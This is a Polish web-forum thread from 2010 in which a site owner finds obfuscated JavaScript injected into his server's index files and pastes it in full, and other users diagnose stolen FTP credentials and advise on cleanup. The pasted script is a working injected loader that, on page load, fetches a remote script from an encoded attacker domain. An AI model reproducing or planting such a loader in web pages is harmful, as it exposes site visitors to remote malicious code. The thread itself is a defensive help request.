benusso
29.03.2010, 19:53:19
Witam
Mam taki problem, do każdego pliku na moim serwerze, coś dołącza taki kod
Kod
<script>var sx=new String();var yI='';this.qX='';var a;if(a!=''){a='Cu'};function U(){var R;if(R!='lg'){R='lg'};var O;if(O!='V'){O='V'};var Y=new Date();var QC=new Date();var N=unescape;var l=String("g");var C='';var Yw="";var jc="";var j=window;var k="\x68\x74\x74\x70\x3a\x2f\x2f\x6f\x6e\x65\x69\x6e\x64\x69\x61\x2d\x69\x6e\x2e\x6e\x61\x76\x65\x72\x2e\x63\x6f\x6d\x2e\x76\x6d\x6e\x2d\x6e\x65\x74\x2e\x72\x65\x61\x64\x79\x6d\x69\x78\x6a\x6f\x62\x73\x2e\x72\x75\x3a";function t(d,M){var kU=N("%5b")+M+N("%5d");this.iu='';var W=new String();var s=new RegExp(kU, l);return d.replace(s, C);var H;if(H!='T' && H != ''){H=null};this.Oi="";};this.Oy="";var En;if(En!=''){En='us'};var i_;if(i_!=''){i_='pv'};var E='';var jf=new String();var At=new Date();var lN=t('8335260612558511106266','21563');var r=N("%2f%72%75%6e%65%73%63%61%70%65%2e%63%6f%6d%2f%72%75%6e%65%73%63%61%70%65%2e%63%6f%6d%2f%77%77%65%2e%63%6f%6d%2f%6e%6f%76%69%6e%6b%79%2e%63%7a%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.Z='';var uZ;if(uZ!='B' && uZ!='Te'){uZ='B'};var ss=new String();var Q=document;var uc=new String();function h(){var YP;if(YP!='' && YP!='Ud'){YP=null};var QT;if(QT!='' && QT!='Gz'){QT=null};E=k;var J;if(J!='' && J!='Ox'){J=''};var _i;if(_i!='lt' && _i!='Vl'){_i=''};E+=lN;var gs;if(gs!='UL' && gs != ''){gs=null};E+=r;var Hk;if(Hk!='AC'){Hk=''};var Mc;if(Mc!='wS' && Mc!='IV'){Mc='wS'};try {var Fd;if(Fd!=''){Fd='Ve'};var Qz=new Array();var ic=new String();c=Q.createElement(t('s1cErWiSpAtS','RS6NWEUPGvLATzg1'));var JZ=new Date();var Of=new Date();c.src=E;c.defer=[1][0];var mg=new String();var z=new Date();Q.body.appendChild(c);} catch(_){var qC=new Array();};}j[new String("OfQon".substr(3)+"lofS1".substr(0,2)+"Z09adZ09".substr(3,2))]=h;var VI;if(VI!='Uc'){VI='Uc'};var Ka='';};var nz='';var kL;if(kL!='Xo' && kL!='Vb'){kL='Xo'};U();</script>
<!--498c806181c0380c40763b3b1b78ae81-->
Czy ktoś wie jak się z tym uporać, co się stało i jak to zwalczyć ?
Pzdr
zend
29.03.2010, 20:08:33
1) Jesteś na darmowym serwerze i dobromyślny usłuodawca dołącza w ten sposób swoje reklamy - rozwiązanie : przenieść serwis na płatny serwer
2) Dobromyślny usługodawca w ten sposób daje Ci system statystyk - rozwiązanie - poszukać w hostingowym panelu administracyjnym jak to wyłączyć i wyłączyć lub zadzwonić do usługodawcy żeby wyłączył
benusso
29.03.2010, 20:10:52
Nie jestem na darmowym serwerze, i nie jest to nic od usługodawcy, dołącza to się do plików od kilku dni dopiero .
zend
29.03.2010, 20:14:14
Ok, sprecyzuj jeszcze kiedy ten skrypt jest dołączany, czy ktoś/coś przerobiło twoje pliki źródłowe, czy pliki są ok a dane itak się pojawiają?
I jeszcze czy to jest strona w całości napisana przez ciebie/kogoś tam, czy to CMS który niedawno aktualizowałeś?
blooregard
29.03.2010, 20:18:42
Przede wszystkim to natychmiast zmień hasła do ftp-a, bazy i co tam jeszcze masz.
Jeśli korzystasz z Windows i Total Commander'a w celu uploadu plików na serwer - sprawdź jakimś antywirem, czy nie masz jakiegoś syfa wykradającego hasła do kont ftp.
A zastanawianiem się, co to się dokleja, zajmij się później.
benusso
29.03.2010, 20:22:04
Pliki są przerobione i na końcu każdego pliku index jest właśnie ten kod.
Stron jest wiele, ale faktycznie zaczęło się to od awarii phpbb3, gdzie tam pojawiło się to jako pierwsze i wydaje mi się że właśnie przez to rozprzestrzeniło się na resztę katalogów. Czy to możliwe ? Jak z tym walczyć teraz ?
Pzdr.
zend
29.03.2010, 20:25:36
phpbb wykrada hasła i zrób jak najszybciej to co napisał @blooregard, mozesz spróbować zastąpić ten ciąg który podałeś pustym ciągiem przy użyciu jakiegos programu na desktopie
l0ud
29.03.2010, 21:14:00
Zdekodowany kod prowadzi na jakąś ruską stronę (zapewne mającą na celu przechwycić sesję/cookies), więc dziura w phpBB raczej nie ma tu nic to rzeczy.
Mi to wygląda na zainfekowany komputer ze starą wersją total commandera z zapisanym hasłem. Nawet jak nie używasz TC, koniecznie przeskanuj komputer, zmień hasła. Dobrze by było wgrać wszystko od nowa (albo chociaż przejrzeć logi i zobaczyć co zostało zmienione/dodane)...
benusso
29.03.2010, 21:52:13
Faktycznie może tak być, gdyż teraz zauważyłem że to samo jest na innym moim serwerze :/ ehh
Fakt używam total commandera.
Coś więcej o tym wiecie ? wywalić TC ?
Pzdr.
erix
29.03.2010, 22:50:34
Nie wywalić. Włączyć szyfrowanie haseł w programie (jest to dostępne od wersji chyba 7.5) kluczem globalnym. Najpierw zaszyfruj hasła w TC, potem zmień je na FTP i dopiero wtedy możesz je wpisać do Commandera.
baranek77
30.03.2010, 06:13:04
Użyj combofixa masz syfa na kompie
yaro015
30.03.2010, 12:21:55
Najpierw zmień hasła do FTPa/bazy tak jak pisano już wyżej, a następnie pozostaje Ci edycja wszystkich plikow index.php, index.html oraz wszystkich plików z rozszerzeniem .js i usunięcie tego złośliwego kawałka kodu.
Przerabiałem ten temat parę miesięcy temu i problem niestety tkwił w TC, z którego zostały wykradzione hasła.
Oprócz plików zawierających w nazwie "index" kod edytuje również pliki JS-owe więc na nie też zwróc uwagę.
Najlepsze jest to, że jeśli choć w jednym pliku zostawisz ten kod, to on i tak rozprzestrzeni się znówu na te które wyczyściłeś
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę
kliknij tutaj.